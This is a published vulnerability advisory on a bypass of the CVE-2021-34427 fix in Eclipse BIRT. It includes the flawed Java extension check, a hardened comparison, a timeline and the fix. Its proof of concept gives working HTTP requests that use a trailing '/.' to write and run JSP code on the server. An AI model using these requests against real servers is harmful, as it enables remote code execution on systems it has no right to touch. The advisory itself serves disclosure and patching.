Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution Vulnerability

1337DAY-ID-38125
Published: 2022-12-24 00:00:00
Author: Armin Stock
Source: 0day.today
Tags: vulnerability, eclipse birt, remote code execution, cve-2021-34427, patch, bypass, sec consult

CVSS2: 7.5 High (AV:N/AC:L/Au:N/C:P/I:P/A:P)
  Attack Vector: NETWORK | Attack Complexity: LOW | Authentication: NONE
  Confidentiality Impact: PARTIAL | Integrity Impact: PARTIAL | Availability Impact: PARTIAL

CVSS3: 9.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: NETWORK | Attack Complexity: LOW | Privileges Required: NONE | User Interaction: NONE
  Scope: UNCHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH

AI Score: 9.7 High (Confidence: High)

EPSS: 0.003 Low (Percentile: 69.2%)

=======================================================================
               title: Remote code execution - CVE-2021-34427 bypass
             product: Eclipse Business Intelligence Reporting Tool (BiRT)
  vulnerable version: <= 4.11.0
       fixed version: 4.12
          CVE number: CVE-2021-34427
              impact: High
            homepage: https://eclipse.github.io/birt-website/
               found: 2022-10-05
                  by: Armin Stock (Atos)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"With BIRT you can create data visualizations, dashboards and reports
that can be embedded into web applications and rich clients. Make information out
of your data!"

https://eclipse.github.io/birt-website/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.


Vulnerability overview/description:
-----------------------------------
1) Remote code execution - CVE-2021-34427 bypass
The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)
allows an attacker to execute code on the server by creating a `.jsp` file
through the `BiRT - WebViewerExample`. This was fixed with the following code:

-------------------------------------------------------------------------------
// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081
  protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {
    int extIndex = rptDocumentName.lastIndexOf(".");
    String extension = null;
    boolean validExtension = true;

    if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {
      extension = rptDocumentName.substring(extIndex + 1);

      if (!disallowedExtensionsForRptDocument.isEmpty()
          && disallowedExtensionsForRptDocument.contains(extension)) {
        validExtension = false;
      }

      if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {
        validExtension = false;
      }

      if (!validExtension) {
        throw new ViewerException(BirtResources.getMessage(
            ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));
      }

    }
  }
-------------------------------------------------------------------------------

This fix can be easily bypassed by appending `/.` to the filename. The check only
inspects the text after the last `.` in the name, and once `/.` is appended that
last `.` is the final character, so `(extIndex + 1) < rptDocumentName.length()`
is false, no extension is extracted and neither the allowed nor the disallowed
list is ever consulted. The document is still written under its `.jsp` name,
which again allows an attacker to execute arbitrary code.
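As an added illustration (this is not BIRT's own code and not the fix shipped in 4.12, which the advisory does not reproduce), the 4.11.0 check quoted above is placed next to a hardened variant that normalizes the path and takes the extension from the final path element only, failing closed when no extension can be determined; the allow/deny sets are an assumed example policy.

```java
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;

public class RptDocumentNameCheck {
    // Assumed example policy: allow only BIRT report documents, explicitly deny JSP.
    static final Set<String> ALLOWED = Set.of("rptdocument");
    static final Set<String> DISALLOWED = Set.of("jsp", "jspx");
    // Mirrors the 4.11.0 logic quoted in the advisory: it inspects the text after the
    // last '.' and silently accepts any name in which nothing follows that last '.'.
    static boolean vulnerableCheck(String name) {
        int extIndex = name.lastIndexOf('.');
        if (extIndex > -1 && extIndex + 1 < name.length()) {
            String ext = name.substring(extIndex + 1);
            if (DISALLOWED.contains(ext) || !ALLOWED.contains(ext)) return false;
        }
        return true; // "info-new.jsp/." lands here: no extension extracted, nothing checked
    }

    // Hardened variant: normalize first, take the extension from the final path element
    // only, compare case-insensitively, and deny anything without a usable extension.
    static boolean hardenedCheck(String name) {
        Path leafPath;
        try {
            leafPath = Paths.get(name).normalize().getFileName(); // "x.jsp/." -> "x.jsp"
        } catch (InvalidPathException e) {
            return false; // e.g. embedded NUL byte
        }
        if (leafPath == null) return false; // e.g. "/" has no file name element
        String leaf = leafPath.toString();
        int extIndex = leaf.lastIndexOf('.');
        if (extIndex < 1 || extIndex + 1 == leaf.length()) return false; // "", ".", "x", ".x", "x."
        String ext = leaf.substring(extIndex + 1).toLowerCase(Locale.ROOT);
        return !DISALLOWED.contains(ext) && ALLOWED.contains(ext); // allow-list is authoritative
    }
    public static void main(String[] args) {
        String[] samples = {
            "./test/report.rptdocument", // legitimate name: both checks accept
            "./test/info-new.jsp",       // original CVE-2021-34427 payload: both reject
            "./test/info-new.jsp/.",     // this advisory's bypass: only the hardened check rejects
            "./test/info-new.JSP/.",     // upper-case variant of the bypass
        };
        for (String s : samples) {
            System.out.printf("%-27s vulnerable=%-5b hardened=%b%n", s, vulnerableCheck(s), hardenedCheck(s));
        }
    }
}
```

Normalizing before inspecting the name is what closes the gap: any `.`/`/.` trickery collapses to the real leaf name before the extension is read, and the empty-extension case is denied instead of skipped.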


Proof of concept:
-----------------
1) Remote code execution - CVE-2021-34427 bypass
The old exploit results in an error message:

-------------------------------------------------------------------------------
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " + 
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1
Host: IP:18080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A
Upgrade-Insecure-Requests: 1
-------------------------------------------------------------------------------

Response:
-------------------------------------------------------------------------------
HTTP/1.1 200
Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2022 06:14:54 GMT
Connection: close
Content-Length: 4644

<html>
<head>
<title>Error</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>
</head>
<body>
<div id="birt_errorPage" style="color:red">
<span id="error_icon"  style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- '; 
document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > + 
</span>

Invalid extension - "jsp" for the __document parameter.
-------------------------------------------------------------------------------

But adding `/.` to the end of the filename creates the file on the server as
before:

-------------------------------------------------------------------------------
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " + 
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1
Host: IP:18080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------
HTTP/1.1 200
Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2022 05:26:01 GMT
Connection: close
Content-Length: 283

<html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head>
<body style="background-color: #ECE9D8;">
<div style="font-size:10pt;"><font color="black">
The report document file has been generated successfully.</font>
</div></body></html>
-------------------------------------------------------------------------------

This allows the execution of the provided `JSP` code, by calling
`/birt/test/info-new.jsp`.


Vulnerable / tested versions:
-----------------------------
The following version has been tested, but all versions <= 4.11 are vulnerable.
* 4.10.0 (2022-10-01)


Vendor contact timeline:
------------------------
2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)
2022-11-17: Vendor confirmed the bypass and is working on a fix.
2022-11-17: Vendor provided a fix.
2022-11-27: The fix was tested and could be bypassed again.
2022-11-27: Vendor acknowledged the bypass and provided a new fix.
2022-11-28: The fix was tested and we were not able to bypass it.
2022-11-30: Vendor releases patched version 4.12.
2022-12-16: Public release of security advisory.


Solution:
---------
Update Eclipse BIRT to version 4.12 or newer from the vendor's website:
https://projects.eclipse.org/projects/technology.birt/releases/4.12.0
